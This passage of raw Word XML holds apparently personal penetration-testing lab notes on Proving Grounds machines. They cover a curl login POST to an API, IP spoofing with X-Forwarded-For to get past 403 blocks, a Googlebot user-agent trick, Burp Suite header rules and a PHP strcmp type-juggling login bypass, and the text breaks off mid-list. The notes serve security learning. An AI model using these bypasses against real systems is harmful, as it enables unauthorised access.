      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-H 'Content-Length: 0'</w:t>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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then they were finally able to access pages, which give them credentials!</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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_va9voelx4qww" w:id="20"/>
      <w:bookmarkEnd w:id="20"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Abusing API endpoints in website URL</w:t>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A REALLY good example of playing with API endpoints was seen in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId35">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Xposedapi</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice (you can tell by the name)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003A5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="290"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId36">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writeup which is more concise but skips on details but provides multiple ways to exploit</w:t>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rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">More information in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XXXXXXXXX 8.3.3. Enumerating and Abusing APIs</w:t>
      </w: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t xml:space="preserve">It also teaches us how to create JSON POST payload from scratch within the CURL command. Like this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="421"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -d '{"password":"fake","username":"admin"}' -H 'Content-Type: application/json'  http://192.168.50.16:5002/users/v1/login</w:t>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D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_t0qumhrch802" w:id="21"/>
      <w:bookmarkEnd w:id="21"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to pretend to be another IP when viewing pages (IP Spoofing) using X-Forwarded-For</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Also used in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId37">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Xposedapi</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice when we got this 403 error:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003B0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1473200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="46"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943600" cy="1473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1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="130"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It was blocking our IP, so we likely have to access it through local host or trick it into thinking the web request is coming from local host</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003B2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1917700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="179" name="image163.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image163.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId39"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="235"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We added the X-Forwarded-For line</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003B4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003B5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And now we have a 404 error instead of 403, meaning we can access the page. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003B6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2146300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="488" name="image481.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image481.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId40"/>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In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId41">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Robust</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice, a website said that we were blocked from visiting the site and that we had to be on 10.10.10.x in order to view the site. So, we can use the X-Forwarded-For HTTP request header to pretend to be 10.10.10.10. This is also known as IP Spoofing</w:t>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t xml:space="preserve">The HTTP X-Forwarded-For (XFF) request header is a de-facto standard header for identifying the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">originating IP address of a client</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> connecting to a web server.</w:t>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t xml:space="preserve">So in the post request, just add: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="119"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">X-Forwarded-For: 10.10.10.10</w:t>
      </w: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2559489" cy="1379965"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="232" name="image241.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image241.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId42"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2559489" cy="1379965"/>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4">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_mpadhrxm038l" w:id="22"/>
      <w:bookmarkEnd w:id="22"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to view pages as a search engine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003C5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003C6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId43">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Inclusiveness</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pg play, we saw that a webpage (robots.txt) said that we can only view the page as a "search engine." So, in order to pretend to be a search engine, we can create a custom user agent named GoogleBot for the search engine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003C7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003C8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo curl -s -- user-agent Googlebot http://192.168.128.14/robots. txt -v</w:t>
      </w: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C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_iq1r15tr2i34" w:id="23"/>
      <w:bookmarkEnd w:id="23"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Burpsuite</w:t>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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_w9jh21fglol" w:id="24"/>
      <w:bookmarkEnd w:id="24"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to automate adding HTTP headers on Burpsuite</w:t>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId44">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Robust</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice, we were going to be sending a lot of HTTP requests via burpsuite, but the only way to access the website was</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> by adding the "X-Forwarded-For" header. And also we wanted to remove the "Location: login.php" header too</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. So instead of manually adding that every time, we automated it using settings in Burpsuite</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003D1">
      <w:pPr>
        <w:rPr/>
      </w:pP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5943600" cy="2578100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="404" name="image420.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image420.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId45"/>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spacing w:after="0" w:before="200" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To make sure we get access to every request, we can add the X-Forwarded-For header to every request we send to the server. Simply click the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'Add' </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">button and enter the header details.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003D5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3322235" cy="1676642"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="540" name="image537.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image537.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId46"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3322235" cy="1676642"/>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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Next, below shows an example of how to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">remove </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">a header that the server has sent as part of a response. This Location header will now be empty when the browser receives it. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003D8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3368718" cy="1700101"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="140" name="image134.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image134.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId47"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3368718" cy="1700101"/>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ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003DA">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003DB">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C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_vctoh0dtqc19" w:id="25"/>
      <w:bookmarkEnd w:id="25"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PHP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003DD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003DE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_x4h38rpx0w59" w:id="26"/>
      <w:bookmarkEnd w:id="26"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">strcmp() bypass with PHP Type Juggling</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t xml:space="preserve">This is from the </w:t>
      </w:r>
      <w:hyperlink r:id="rId48">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Potato</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> from PG Play</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003E1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003E2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In this box, we had authentication with an admin PHP page that had this line:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003E3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="423"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">strcmp($_POST['password'], $pass) = 0</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t xml:space="preserve">Here, we can bypass strcmp to make it return NULL, and since NULL = 0 in PHP, then this all returns True, allowing us to get logged in.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003E6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003E7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1111"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First, we have to submit something on the form, for example put "mike" as the password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003E8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1111"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then intercept the POST request and you should see "password=mike" in the request</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1111"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then change it to "password[]=mike", and you can actually replace "mike" with anything</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1111"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
